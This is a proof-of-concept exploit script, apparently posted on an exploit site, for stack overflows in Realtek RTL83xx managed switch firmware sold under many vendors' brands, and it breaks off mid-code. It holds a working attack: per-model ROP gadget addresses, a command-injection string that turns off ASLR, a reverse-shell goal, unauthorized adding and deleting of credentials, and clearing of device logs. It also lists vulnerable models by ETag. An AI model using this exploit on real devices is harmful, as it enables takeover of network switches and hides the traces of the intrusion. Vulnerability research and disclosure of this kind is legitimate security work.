https://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller

[Brief description]

1.	Boa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected)
	Note: The vulnerability are _not_ from Boa nor Hydra, coming from Realtek additional coding
2.	Reuse of code between vendors gives almost indentical exploitation of found vulnerabilities
3.	Two strcpy() vulnerable fixed buffers next to each others in same function make it easy for jumping in Big Endian

[Goals for this PoC]

1.	One Python PoC for all vendors
	Using dictionaries to have one 'template' for each vendor and another dictionary with unique details for each target, to be merged on the fly.
	The python code will read and use details from dictionary when verifying/exploiting

2.	Uniquely identify remote target
	ETag - Static and excellent tool for determine remote target, due to non-changing 'last modified' in same revision of Firmware

	ETag: xxxxx-yyyyy
	xxxxx = file size (up to 5 digits)
	yyyyy = last modified (up to 5 digits)

3.	Reverse shell
	MIPS Big Endian shellcode is the only option, as there are no 'netcat/telnet/stunnel.. etc' availible

4.	add/delete credentials for GUI/CLI
	Quite many of the firmware's has the 'option' to add valid credentials by unauthorized updating of 'running-config'
	For those who has added protection, we can add/delete credentials with an bit interesting jumping sequence

[Technical brief]
1.	Stack       - Read/Write/Executable (Using CMD injection in the PoC to turn off ASLR)
2.	Heap        - Read/Write/Executable (No need to turn off, ASLR not turned on for heap)
3.	fork        - Boa/Hydra using forking shellcode, as I want try restart Boa/Hydra to avoid DoS after successful reverse shell

Two vulnerable buffers with fixed size in same call, we overwrite $RA with four bytes, and overwrite first byte in $RA with second buffers NULL termination,
this allows us to jump within the binary itself, and passing arguments for the function we jumping to by tailing these with the original request

[Basically]
First buffer:         [aaaaaaaa][0x58xxxxxx]	('a' and 0x58 will be overwritten by second buffer)
Second buffer: [bbbbb][bbbbbbbb][0x00xxxxxx]	(NULL termination will overwrite 0x58)

[Known targets]

All below is fully exploitable, with following exception:
[*] ETag: 639-98866   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
[*] ETag: 639-73124   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]

Not because they are not vulnerable, its because 1) their heap addresses lays at the '0x478000-0x47a000' range,
and 2) they using obfuscation 'encode' for the password (99 bytes max), we can never reach the 'two buffers' jump method.
[They are still fully exploitable with the Boa/Hydra vulnerability]

Note:
In this PoC I have only implemented few affected versions, in reality there is many more models and FW version affected.


$ ./Realtek-RTL83xx-PoC.py --etag help

[*] Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)
[*] RHOST: 192.168.57.20
[*] RPORT: 80
[*] LHOST: 192.168.57.1
[*] LPORT: 1337
[+] Target: List of known targets

[*] ETag: 225-51973   [Cisco Systems, Inc. Sx220 v1.1.3.1]
[*] ETag: 225-60080   [Cisco Systems, Inc. Sx220 v1.1.4.1]
[*] ETag: 752-76347   [ALLNET GmbH Computersysteme ALL-SG8208M v2.2.1]
[*] ETag: 225-21785   [Pakedgedevice &amp; Software Inc SX-8P v1.04]
[*] ETag: 222-71560   [Zyxel Communications Corp. GS1900-24 v2.40_AAHL.1_20180705]
[*] ETag: 14044-509   [EnGenius Technologies, Inc. EGS2110P v1.05.20_150810-1754]
[*] ETag: 13984-12788 [Open Mesh, Inc. OMS24 v01.03.24_180823-1626]
[*] ETag: 218-22429   [PLANET Technology Corp. GS-4210-8P2S v1.0b171116]
[*] ETag: 218-7473    [PLANET Technology Corp. GS-4210-24T2S v2.0b160727]
[*] ETag: 752-95168   [DrayTek Corp. VigorSwitch P1100 v2.1.4]
[*] ETag: 225-96283   [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.6]
[*] ETag: 225-63242   [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.5]
[*] ETag: 224-5061    [CERIO Corp. CS-2424G-24P v1.00.29]
[*] ETag: 222-50100   [ALLNET GmbH Computersysteme ALL-SG8310PM v3.1.1-R3-B1]
[*] ETag: 222-81176   [Shenzhen TG-NET Botone Technology Co,. Ltd. P3026M-24POE (V3) v3.1.1-R1]
[*] ETag: 8028-89928  [Araknis Networks AN-310-SW-16-POE v1.2.00_171225-1618]
[*] ETag: 222-64895   [Xhome DownLoop-G24M v3.0.0.43126]
[*] ETag: 222-40570   [Realtek RTL8380-24GE-4GEC v3.0.0.43126]
[*] ETag: 222-45866   [Abaniact AML2-PS16-17GP L2 v116B00033]
[*] ETag: 14044-44104 [EnGenius Technologies, Inc. EWS1200-28TFP v1.07.22_c1.9.21_181018-0228]
[*] ETag: 14044-32589 [EnGenius Technologies, Inc. EWS1200-28TFP v1.06.21_c1.8.77_180906-0716]
[*] ETag: 609-31457   [NETGEAR Inc. GS750E ProSAFE Plus Switch v1.0.0.22]
[*] ETag: 639-98866   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
[*] ETag: 639-73124   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]


[*] All done...

[Other vendors]
These names have been found within some Firmware images, but not implemented as I have not found any Firmware images.
(However, I suspect they use exact same Firmware due to the traces are 'logo[1-10].jpg/login[1-10].jpg')

[*] 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power

[Known bugs]
1.	Non-JSON:
	'/mntlog/flash.log' and '/var/log/flash.log' not always removed when using 'stack_cgi_log()'
	(Must change value for 'flash.log' that needs to be 0x02, 'flash.log' has value 0x00)

[Responsible Disclosure]
Working with VDOO since early February 2019 to disclosure found vulnerabilities to vendors
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches


[Technical details]
Please read the code

"""</span>
<span class="token comment"># Have a nice day</span>
<span class="token comment"># /bashis</span>
<span class="token comment">#</span>

<span class="token keyword">import</span> string
<span class="token keyword">import</span> sys
<span class="token keyword">import</span> socket
<span class="token keyword">import</span> argparse
<span class="token keyword">import</span> urllib<span class="token punctuation">,</span> urllib2<span class="token punctuation">,</span> httplib
<span class="token keyword">import</span> base64
<span class="token keyword">import</span> ssl
<span class="token keyword">import</span> hashlib
<span class="token keyword">import</span> re
<span class="token keyword">import</span> struct
<span class="token keyword">import</span> time
<span class="token keyword">import</span> thread
<span class="token keyword">import</span> json
<span class="token keyword">import</span> inspect
<span class="token keyword">import</span> copy

<span class="token keyword">import</span> hashlib
<span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>Cipher <span class="token keyword">import</span> AES
<span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>Cipher <span class="token keyword">import</span> PKCS1_v1_5
<span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>PublicKey <span class="token keyword">import</span> RSA
<span class="token keyword">from</span> Crypto <span class="token keyword">import</span> Random
<span class="token keyword">from</span> random <span class="token keyword">import</span> randint

<span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span> <span class="token comment"># pip install pwn</span>

<span class="token keyword">global</span> debug
debug <span class="token operator">=</span> <span class="token boolean">False</span>
<span class="token keyword">global</span> force
force <span class="token operator">=</span> <span class="token boolean">False</span>

<span class="token keyword">def</span> <span class="token function">DEBUG</span><span class="token punctuation">(</span>direction<span class="token punctuation">,</span> text<span class="token punctuation">)</span><span class="token punctuation">:</span>
	<span class="token keyword">if</span> debug<span class="token punctuation">:</span>
		<span class="token comment"># Print send/recv data and current line number</span>
		<span class="token keyword">print</span> <span class="token string">"[BEGIN {}] &lt;{:-^60}&gt;"</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>direction<span class="token punctuation">,</span> inspect<span class="token punctuation">.</span>currentframe<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>f_back<span class="token punctuation">.</span>f_lineno<span class="token punctuation">)</span>
		<span class="token keyword">print</span> <span class="token string">"\n{}\n"</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>text<span class="token punctuation">)</span>
		<span class="token keyword">print</span> <span class="token string">"[ END  {}] &lt;{:-^60}&gt;"</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>direction<span class="token punctuation">,</span> inspect<span class="token punctuation">.</span>currentframe<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>f_back<span class="token punctuation">.</span>f_lineno<span class="token punctuation">)</span>
	<span class="token keyword">return</span>

<span class="token keyword">class</span> <span class="token class-name">HTTPconnect</span><span class="token punctuation">:</span>

	<span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span> host<span class="token punctuation">,</span> proto<span class="token punctuation">,</span> verbose<span class="token punctuation">,</span> creds<span class="token punctuation">,</span> Raw<span class="token punctuation">)</span><span class="token punctuation">:</span>
		self<span class="token punctuation">.</span>host <span class="token operator">=</span> host
		self<span class="token punctuation">.</span>proto <span class="token operator">=</span> proto
		self<span class="token punctuation">.</span>verbose <span class="token operator">=</span> verbose
		self<span class="token punctuation">.</span>credentials <span class="token operator">=</span> creds
		self<span class="token punctuation">.</span>Raw <span class="token operator">=</span> Raw
	
	<span class="token keyword">def</span> <span class="token function">Send</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span> uri<span class="token punctuation">,</span> query_headers<span class="token punctuation">,</span> query_data<span class="token punctuation">,</span>ID<span class="token punctuation">,</span>encode_query<span class="token punctuation">)</span><span class="token punctuation">:</span>
		self<span class="token punctuation">.</span>uri <span class="token operator">=</span> uri
		self<span class="token punctuation">.</span>query_headers <span class="token operator">=</span> query_headers
		self<span class="token punctuation">.</span>query_data <span class="token operator">=</span> query_data
		self<span class="token punctuation">.</span>ID <span class="token operator">=</span> ID
		self<span class="token punctuation">.</span>encode_query <span class="token operator">=</span> encode_query

		<span class="token comment"># Connect-timeout in seconds</span>
		<span class="token comment">#timeout = 5</span>
		<span class="token comment">#socket.setdefaulttimeout(timeout)</span>

		url <span class="token operator">=</span> <span class="token string">'{}://{}{}'</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>self<span class="token punctuation">.</span>proto<span class="token punctuation">,</span> self<span class="token punctuation">.</span>host<span class="token punctuation">,</span> self<span class="token punctuation">.</span>uri<span class="token punctuation">)</span>

		<span class="token keyword">if</span> self<span class="token punctuation">.</span>verbose<span class="token punctuation">:</span>
			log<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string">"[Verbose] Sending: {}"</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>url<span class="token punctuation">)</span><span class="token punctuation">)</span>

		<span class="token keyword">if</span> self<span class="token punctuation">.</span>proto <span class="token operator">==</span> <span class="token string">'https'</span><span class="token punctuation">:</span>
			<span class="token keyword">if</span> <span class="token builtin">hasattr</span><span class="token punctuation">(</span>ssl<span class="token punctuation">,</span> <span class="token string">'_create_unverified_context'</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
				<span class="token comment">#log.info("Creating SSL Unverified Context")</span>
				ssl<span class="token punctuation">.</span>_create_default_https_context <span class="token operator">=</span> ssl<span class="token punctuation">.</span>_create_unverified_context

		<span class="token keyword">if</span> self<span class="token punctuation">.</span>credentials<span class="token punctuation">:</span>
			Basic_Auth <span class="token operator">=</span> self<span class="token punctuation">.</span>credentials<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">':'</span><span class="token punctuation">)</span>
			<span class="token keyword">if</span> self<span class="token punctuation">.</span>verbose<span class="token punctuation">:</span>
				log<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string">"[Verbose] User: {}, Password: {}"</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>Basic_Auth<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">,</span>Basic_Auth<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
			<span class="token keyword">try</span><span class="token punctuation">:</span>
				pwd_mgr <span class="token operator">=</span> urllib2<span class="token punctuation">.</span>HTTPPasswordMgrWithDefaultRealm<span class="token punctuation">(</span><span class="token punctuation">)</span>
				pwd_mgr<span class="token punctuation">.</span>add_password<span class="token punctuation">(</span><span class="token boolean">None</span><span class="token punctuation">,</span> url<span class="token punctuation">,</span> Basic_Auth<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">,</span> Basic_Auth<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
				auth_handler <span class="token operator">=</span> urllib2<span class="token punctuation">.</span>HTTPBasicAuthHandler<span class="token punctuation">(</span>pwd_mgr<span class="token punctuation">)</span>
				opener <span class="token operator">=</span> urllib2<span class="token punctuation">.</span>build_opener<span class="token punctuation">(</span>auth_handler<span class="token punctuation">)</span>
				urllib2<span class="token punctuation">.</span>install_opener<span class="token punctuation">(</span>opener<span class="token punctuation">)</span>
			<span class="token keyword">except</span> Exception <span class="token keyword">as</span> e<span class="token punctuation">:</span>
				log<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string">"Basic Auth Error: {}"</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>e<span class="token punctuation">)</span><span class="token punctuation">)</span>
				sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>

		<span class="token keyword">if</span> self<span class="token punctuation">.</span>query_data<span class="token punctuation">:</span>
			<span class="token comment">#request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)</span>
			<span class="token keyword">if</span> self<span class="token punctuation">.</span>query_data <span class="token operator">and</span> self<span class="token punctuation">.</span>encode_query<span class="token punctuation">:</span>
				request <span class="token operator">=</span> urllib2<span class="token punctuation">.</span>Request<span class="token punctuation">(</span>url<span class="token punctuation">,</span> data<span class="token operator">=</span>urllib<span class="token punctuation">.</span>urlencode<span class="token punctuation">(</span>self<span class="token punctuation">.</span>query_data<span class="token punctuation">,</span>doseq<span class="token operator">=</span><span class="token boolean">True</span><span class="token punctuation">)</span><span class="token punctuation">,</span> headers<span class="token operator">=</span>self<span class="token punctuation">.</span>query_headers<span class="token punctuation">)</span>
			<span class="token keyword">else</span><span class="token punctuation">:</span>
				request <span class="token operator">=</span> urllib2<span class="token punctuation">.</span>Request<span class="token punctuation">(</span>url<span class="token punctuation">,</span> data<span class="token operator">=</span>self<span class="token punctuation">.</span>query_data<span class="token punctuation">,</span> headers<span class="token operator">=</span>self<span class="token punctuation">.</span>query_headers<span class="token punctuation">)</span>

			<span class="token keyword">if</span> self<span class="token punctuation">.</span>ID<span class="token punctuation">:</span>
				request<span class="token punctuation">.</span>add_header<span class="token punctuation">(</span><span class="token string">'Cookie'</span><span class="token punctuation">,</span> self<span class="token punctuation">.</span>ID<span class="token punctuation">)</span>
		<span class="token keyword">else</span><span class="token punctuation">:</span>
			request <span class="token operator">=</span> urllib2<span class="token punctuation">.</span>Request<span class="token punctuation">(</span>url<span class="token punctuation">,</span> <span class="token boolean">None</span><span class="token punctuation">,</span> headers<span class="token operator">=</span>self<span class="token punctuation">.</span>query_headers<span class="token punctuation">)</span>
			<span class="token keyword">if</span> self<span class="token punctuation">.</span>ID<span class="token punctuation">:</span>
				request<span class="token punctuation">.</span>add_header<span class="token punctuation">(</span><span class="token string">'Cookie'</span><span class="token punctuation">,</span> self<span class="token punctuation">.</span>ID<span class="token punctuation">)</span>
		response <span class="token operator">=</span> urllib2<span class="token punctuation">.</span>urlopen<span class="token punctuation">(</span>request<span class="token punctuation">)</span>
		<span class="token comment">#if response:</span>
		<span class="token comment">#	print "[&lt;] {} OK".format(response.code)</span>

		<span class="token keyword">if</span> self<span class="token punctuation">.</span>Raw<span class="token punctuation">:</span>
			<span class="token keyword">return</span> response
		<span class="token keyword">else</span><span class="token punctuation">:</span>
			html <span class="token operator">=</span> response<span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span>
			<span class="token keyword">return</span> html

<span class="token comment">#</span>
<span class="token comment"># Validate correctness of HOST, IP and PORT</span>
<span class="token comment">#</span>
<span class="token keyword">class</span> <span class="token class-name">Validate</span><span class="token punctuation">:</span>

	<span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>verbose<span class="token punctuation">)</span><span class="token punctuation">:</span>
		self<span class="token punctuation">.</span>verbose <span class="token operator">=</span> verbose

	<span class="token comment"># Check if IP is valid</span>
	<span class="token keyword">def</span> <span class="token function">CheckIP</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>IP<span class="token punctuation">)</span><span class="token punctuation">:</span>
		self<span class="token punctuation">.</span>IP <span class="token operator">=</span> IP

		ip <span class="token operator">=</span> self<span class="token punctuation">.</span>IP<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">'.'</span><span class="token punctuation">)</span>
		<span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span>ip<span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token number">4</span><span class="token punctuation">:</span>
			<span class="token keyword">return</span> <span class="token boolean">False</span>
		<span class="token keyword">for</span> tmp <span class="token keyword">in</span> ip<span class="token punctuation">:</span>
			<span class="token keyword">if</span> <span class="token operator">not</span> tmp<span class="token punctuation">.</span>isdigit<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
				<span class="token keyword">return</span> <span class="token boolean">False</span>
		i <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>tmp<span class="token punctuation">)</span>
		<span class="token keyword">if</span> i <span class="token operator">&lt;</span> <span class="token number">0</span> <span class="token operator">or</span> i <span class="token operator">&gt;</span> <span class="token number">255</span><span class="token punctuation">:</span>
			<span class="token keyword">return</span> <span class="token boolean">False</span>
		<span class="token keyword">return</span> <span class="token boolean">True</span>

	<span class="token comment"># Check if PORT is valid</span>
	<span class="token keyword">def</span> <span class="token function">Port</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>PORT<span class="token punctuation">)</span><span class="token punctuation">:</span>
		self<span class="token punctuation">.</span>PORT <span class="token operator">=</span> PORT

		<span class="token keyword">if</span> <span class="token builtin">int</span><span class="token punctuation">(</span>self<span class="token punctuation">.</span>PORT<span class="token punctuation">)</span> <span class="token operator">&lt;</span> <span class="token number">1</span> <span class="token operator">or</span> <span class="token builtin">int</span><span class="token punctuation">(</span>self<span class="token punctuation">.</span>PORT<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token number">65535</span><span class="token punctuation">:</span>
			<span class="token keyword">return</span> <span class="token boolean">False</span>
		<span class="token keyword">else</span><span class="token punctuation">:</span>
			<span class="token keyword">return</span> <span class="token boolean">True</span>

	<span class="token comment"># Check if HOST is valid</span>
	<span class="token keyword">def</span> <span class="token function">Host</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>HOST<span class="token punctuation">)</span><span class="token punctuation">:</span>
		self<span class="token punctuation">.</span>HOST <span class="token operator">=</span> HOST

		<span class="token keyword">try</span><span class="token punctuation">:</span>
			<span class="token comment"># Check valid IP</span>
			socket<span class="token punctuation">.</span>inet_aton<span class="token punctuation">(</span>self<span class="token punctuation">.</span>HOST<span class="token punctuation">)</span> <span class="token comment"># Will generate exeption if we try with FQDN or invalid IP</span>
			<span class="token comment"># Now we check if it is correct typed IP</span>
			<span class="token keyword">if</span> self<span class="token punctuation">.</span>CheckIP<span class="token punctuation">(</span>self<span class="token punctuation">.</span>HOST<span class="token punctuation">)</span><span class="token punctuation">:</span>
				<span class="token keyword">return</span> self<span class="token punctuation">.</span>HOST
			<span class="token keyword">else</span><span class="token punctuation">:</span>
				<span class="token keyword">return</span> <span class="token boolean">False</span>
		<span class="token keyword">except</span> socket<span class="token punctuation">.</span>error <span class="token keyword">as</span> e<span class="token punctuation">:</span>
			<span class="token comment"># Else check valid FQDN name, and use the IP address</span>
			<span class="token keyword">try</span><span class="token punctuation">:</span>
				self<span class="token punctuation">.</span>HOST <span class="token operator">=</span> socket<span class="token punctuation">.</span>gethostbyname<span class="token punctuation">(</span>self<span class="token punctuation">.</span>HOST<span class="token punctuation">)</span>
				<span class="token keyword">return</span> self<span class="token punctuation">.</span>HOST
			<span class="token keyword">except</span> socket<span class="token punctuation">.</span>error <span class="token keyword">as</span> e<span class="token punctuation">:</span>
				<span class="token keyword">return</span> <span class="token boolean">False</span>

<span class="token keyword">class</span> <span class="token class-name">Vendor</span><span class="token punctuation">:</span>

	<span class="token keyword">def</span> <span class="token function">__init__</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span> ETag<span class="token punctuation">)</span><span class="token punctuation">:</span>
		self<span class="token punctuation">.</span>ETag <span class="token operator">=</span> ETag

	<span class="token keyword">def</span> <span class="token function">random_string</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span>length<span class="token punctuation">)</span><span class="token punctuation">:</span>
		self<span class="token punctuation">.</span>length <span class="token operator">=</span> length

		<span class="token keyword">return</span> <span class="token string">"a"</span> <span class="token operator">*</span> self<span class="token punctuation">.</span>length
		<span class="token comment">#return ''.join(random.choice(string.lowercase) for i in range(self.length))</span>

	<span class="token comment">#</span>
	<span class="token comment"># Source: https://gist.github.com/angstwad/bf22d1822c38a92ec0a9</span>
	<span class="token comment">#</span>
	<span class="token keyword">def</span> <span class="token function">dict_merge</span><span class="token punctuation">(</span>self<span class="token punctuation">,</span> dct<span class="token punctuation">,</span> merge_dct<span class="token punctuation">)</span><span class="token punctuation">:</span>
		<span class="token triple-quoted-string string">""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
		updating only top-level keys, dict_merge recurses down into dicts nested
		to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
		``dct``.
		:param dct: dict onto which the merge is executed
		:param merge_dct: dct merged into dct
		:return: None
		"""</span>
		<span class="token keyword">for</span> k<span class="token punctuation">,</span> v <span class="token keyword">in</span> merge_dct<span class="token punctuation">.</span>iteritems<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
			<span class="token keyword">if</span> <span class="token punctuation">(</span>k <span class="token keyword">in</span> dct <span class="token operator">and</span> <span class="token builtin">isinstance</span><span class="token punctuation">(</span>dct<span class="token punctuation">[</span>k<span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token builtin">dict</span><span class="token punctuation">)</span>
					<span class="token operator">and</span> <span class="token builtin">isinstance</span><span class="token punctuation">(</span>merge_dct<span class="token punctuation">[</span>k<span class="token punctuation">]</span><span class="token punctuation">,</span> collections<span class="token punctuation">.</span>Mapping<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
				self<span class="token punctuation">.</span>dict_merge<span class="token punctuation">(</span>dct<span class="token punctuation">[</span>k<span class="token punctuation">]</span><span class="token punctuation">,</span> merge_dct<span class="token punctuation">[</span>k<span class="token punctuation">]</span><span class="token punctuation">)</span>
			<span class="token keyword">else</span><span class="token punctuation">:</span>
				dct<span class="token punctuation">[</span>k<span class="token punctuation">]</span> <span class="token operator">=</span> merge_dct<span class="token punctuation">[</span>k<span class="token punctuation">]</span>


	<span class="token comment">#</span>
	<span class="token comment"># Difference between vendors and Firmware versions.</span>
	<span class="token comment"># The update code will search below and update the template on the fly</span>
	<span class="token comment"># (you can tweak and add code in the template from here)</span>
	<span class="token comment">#</span>
	<span class="token comment"># ETag - excellent tool for determine the target</span>
	<span class="token comment">#</span>
	<span class="token comment"># ETag: xxxxx-yyyyy</span>
	<span class="token comment"># xxxxx = file size (up to 5 digits)</span>
	<span class="token comment"># yyyyy = last modified (up to 5 digits)</span>
	<span class="token comment">#</span>
	<span class="token keyword">def</span> <span class="token function">dict</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>

		Vendor_ETag <span class="token operator">=</span> <span class="token punctuation">{</span>
			<span class="token comment">#</span>
			<span class="token comment"># PLANET Technology Corp.</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'218-22429'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Planet'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.0b171116'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'GS-4210-8P2S'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.planet.com.tw/en/product/GS-4210-8P2S'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E04C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99851c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484029c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token comment"># Ping IPv4</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x423B9C</span><span class="token punctuation">,</span>	<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()</span>
						<span class="token comment"># traceroute</span>
						<span class="token comment">#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 &gt; /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;&amp;tr_maxhop=30&amp;count=1',</span>
						<span class="token comment">#'verify_uri':'/tmp/check',</span>
						<span class="token comment">#'web_sys_ping_post':0x4243FC,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x489368</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x48AB84</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x48C240</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
